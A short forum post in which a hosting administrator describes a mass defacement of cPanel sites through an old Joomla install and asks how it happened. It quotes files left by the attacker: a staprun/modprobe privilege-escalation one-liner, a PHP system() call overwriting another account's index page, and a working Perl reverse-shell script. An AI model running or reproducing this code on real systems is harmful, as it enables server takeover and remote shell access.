Deface ...

[Creahold]

Hi

I use Cpanel from 2003. From 2004 to December 2012, none Massive daface.
In January 2 massive deface.
A person uploaded into 1 site (site with an old versione joomla) some files
He was enable to modify index with chown: root.account_name new_index.php
How is possible that an account from web can use root permission?
Is a new bug of apache? php (i know that 5.2 is old)?
I use mod_sec (last version)
How to limit these massive deface? Limit root account from web?
Into files i find this directive

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever

and

system("cat /home/ricambic/public_html/images/stories/install/Ecarter65.html>/home/admin/public_html/index.htm");

and

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

thanks
regards